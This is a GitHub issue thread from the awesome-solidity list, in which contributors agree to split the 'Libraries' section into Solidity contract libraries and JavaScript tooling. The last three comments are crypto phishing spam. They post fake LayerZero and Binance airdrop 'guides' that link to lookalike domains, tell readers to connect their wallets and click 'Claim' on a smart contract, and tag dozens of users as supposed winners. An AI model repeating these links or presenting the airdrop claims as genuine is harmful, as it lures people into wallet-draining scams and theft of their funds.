### ISSUE TITLE
List should distinguish between solidity code libaries and tooling

### ISSUE THREAD

**Issue by TimDaub** [bkrem/awesome-solidity#93]
https://github.com/bkrem/awesome-solidity#libraries

currently this section mixes e.g. solidity library code like ...erc20.. with JavaScript Solidity tooling ...truffle-create-dapp...
It'd be helpful if there were two distinct lists, one for Solidity tooling and one for Solidity libraries like e.g. the openzepellin-contracts.

**Comment by clairecharles** [comment]
Hey  @TimDaub I would love to work on this if it hasn't yet been fixed

**Comment by TimDaub** [comment]
probably best u clarify this with the repository owner

**Comment by bkrem** [comment]
Hey @TimDaub, hey @claire-me,

I completely agree with Tim's original point here, over the years especially the "Libraries" section has become too one-size-fits-all.

That would be amazing if you can show that section some love Claire 🙏  I'd be sure to give you a special shoutout on the list, as a grateful maintainer :)

**Comment by clairecharles** [comment]
Created a pr @bkrem

**Comment by Akshaykk12** [comment]
Is the problem solved?

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by AkhshyBalakannan** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @LaurenceM10, @weisuoke, @felixkuang, @omsin, @totalswift, @amazingandyyy, @T4533N, @devcraft1, @lawal-mj, @westonli, @springzh, @AjayRao91, @PlatoScript, @xsrh, @NicoHinderling, @Eren-Yeaager, @merin83, @alexten1010, @LightFi91, @habibi242, @aintnuffin, @SouravInsights, @AhmetKaplan0, @pptphutho, @aoooio, @lukazibert, @kg-kartik, @0xAshish, @t-tojima, @phantuanvi, @Pumpkir, @qbig, @shadromani, @sunlei, @lyvietson95, @bitsnaps, @punitpratapsingh, @swaroopmaddu, @12Chris12, @stackpt, @noskovvkirill, @susonwaiba, @Pentium1080Ti, @OstrichAlgorithm, @jjobel, @lopeselio, @mrlsaivarma, @matcom-chacha, @xoxo5666, @TogoInc
